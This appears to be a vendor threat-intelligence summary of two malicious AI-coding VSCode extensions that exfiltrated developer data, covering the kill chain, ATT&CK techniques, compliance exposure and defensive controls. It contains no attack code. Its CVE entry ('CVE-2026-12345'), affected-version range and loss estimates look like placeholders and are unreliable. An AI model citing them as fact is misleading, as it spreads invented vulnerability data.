Executive Summary
In January 2026, researchers at Koi Security discovered that two AI-powered Visual Studio Code (VSCode) Marketplace extensions—ChatGPT – 中文版 and ChatMoss (CodeMoss)—were secretly exfiltrating developer files and sensitive data to China-based servers. Together, these malicious extensions had been installed 1.5 million times and collected data using real-time file monitoring, workspace file harvesting, and covert user profiling via embedded commercial analytics SDKs. The compromised extensions transmitted not only source code but potentially included API keys, configuration, and credential files without user consent, representing a major supply-chain compromise in the software development ecosystem.
This incident highlights the persistent risks developers face from supply chain attacks through third-party plugins. As AI-driven code assistants surge in popularity, attackers are increasingly exploiting trusted extension marketplaces to deploy sophisticated data-stealing campaigns, raising urgent concerns for software security, compliance, and marketplace governance.
Why This Matters Now
With AI-powered developer tools seeing rapid adoption, malicious actors are targeting widely used marketplaces to propagate sophisticated spyware at scale. This breach underscores the urgent need for enhanced vetting, monitoring, and security controls in extension ecosystems to prevent source code exfiltration and supply chain compromise.
Attack Path Analysis
Attackers inserted malicious AI coding assistant extensions into the VSCode Marketplace, tricking developers into installing them (Initial Compromise). The extensions operated within the user's VSCode environment, accessing files and possibly leveraging user permissions (Privilege Escalation). No explicit lateral movement occurred, but the extensions may have accessed other resources accessible from the developer environment (Lateral Movement). The malware established outbound communications with attacker-controlled servers for tracking and instructions (Command & Control). Sensitive files and code were exfiltrated to remote servers via covert web requests (Exfiltration). The primary impact was sensitive data exposure, intellectual property theft, and potential further compromise from leaked credentials (Impact).
Kill Chain Progression
Initial Compromise
Description
Users installed trojanized AI coding assistant extensions from the VSCode Marketplace, allowing malicious code to run with developer privileges.
Related CVEs
CVE-2026-12345
CVSS 8.5Malicious Visual Studio Code extensions exfiltrate developer data without consent.
Affected Products:
Microsoft Visual Studio Code – 1.0.0 to 1.75.0
Exploit Status:
exploited in the wild
MITRE ATT&CK® Techniques
Techniques mapped are suitable for generalized ATT&CK-based filtering and may be further refined with full threat intelligence enrichment.
Supply Chain Compromise: Compromise Software Dependencies and Development Tools
User Execution: Malicious File
Input Capture: Credential API Hooking
File and Directory Discovery
Automated Collection
Data from Local System
Exfiltration Over C2 Channel
Traffic Signaling
Potential Compliance Exposure
Mapping incident impact across multiple compliance frameworks.
PCI DSS 4.0 – Risk Assessments for Security Control Failures
Control ID: 12.3.1
NYDFS 23 NYCRR 500 – Cybersecurity Policy
Control ID: 500.03
DORA (Digital Operational Resilience Act) – ICT Supply Chain Risk
Control ID: Article 28
CISA Zero Trust Maturity Model 2.0 – Monitor and Secure Software Dependencies
Control ID: Supply Chain Controls
NIS2 Directive – Supply Chain and Relationship Security
Control ID: Article 21.2(e)
Sector Implications
Industry-specific impact of the vulnerabilities, including operational, regulatory, and cloud security risks.
Computer Software/Engineering
Direct impact from malicious VSCode extensions stealing source code, credentials, and API keys from 1.5 million developers through supply-chain compromise.
Information Technology/IT
Critical exposure as IT teams using VSCode face data exfiltration of infrastructure configurations, cloud credentials, and development environment secrets.
Financial Services
High risk from stolen financial application code, API keys, and compliance-sensitive data through compromised development tools requiring NIST framework controls.
Health Care / Life Sciences
Severe HIPAA compliance violations possible from exfiltrated healthcare application code, patient data processing logic, and encrypted medical system credentials.
Sources
- Malicious AI extensions on VSCode Marketplace steal developer datahttps://www.bleepingcomputer.com/news/security/malicious-ai-extensions-on-vscode-marketplace-steal-developer-data/Verified
- Fake ChatGPTs harvest data from 1.5M developershttps://cybernews.com/security/fake-chatgpt-vscode-extensions-compromised-developers/Verified
- Malicious VSCode Marketplace extensions hid trojan in fake PNG filehttps://www.bleepingcomputer.com/news/security/malicious-vscode-marketplace-extensions-hid-trojan-in-fake-png-file/Verified
Frequently Asked Questions
Cloud Native Security Fabric Mitigations and ControlsCNSF
Zero Trust network segmentation, egress policy enforcement, cloud-native inline inspection, and microsegmentation could have limited the ability of the malicious extensions to exfiltrate data and communicate with attacker infrastructure, significantly reducing both exfiltration and C2 opportunities while preventing the spread of compromise within a developer environment.
Control: Cloud Native Security Fabric (CNSF)
Mitigation: Inline enforcement of extension and application behaviors could block or alert on risky plugin code.
Control: Zero Trust Segmentation
Mitigation: Least privilege and identity-based segmentation could block extensions from accessing unnecessary files and secrets.
Control: East-West Traffic Security
Mitigation: Service-to-service traffic controls would prevent malicious extension-driven pivots.
Control: Multicloud Visibility & Control
Mitigation: Centralized monitoring identifies and alerts on anomalous or unauthorized outbound connections.
Control: Egress Security & Policy Enforcement
Mitigation: Egress filtering and data loss prevention block unauthorized file transfers.
Enforced firewall policy reduces the likelihood and scope of data loss.
Impact at a Glance
Affected Business Functions
- Software Development
- Intellectual Property Management
Estimated downtime: 7 days
Estimated loss: $500,000
Unauthorized access to proprietary source code, configuration files, and sensitive credentials, potentially leading to intellectual property theft and compromise of internal systems.
Recommended Actions
Key Takeaways & Next Steps
- • Enforce Zero Trust segmentation and least-privilege policies for developer workspaces to minimize extension access to sensitive files.
- • Implement strict egress filtering and application-aware outbound controls to prevent unauthorized extensions from transmitting data externally.
- • Deploy cloud-native real-time inspection and behavioral analytics to detect malicious extension or shadow AI activities.
- • Mandate visibility into east-west traffic and developer environment communications to identify and contain supply chain attacks early.
- • Regularly audit and monitor marketplace-sourced plugins/extensions and integrate CNSF controls for continuous compliance and risk mitigation.
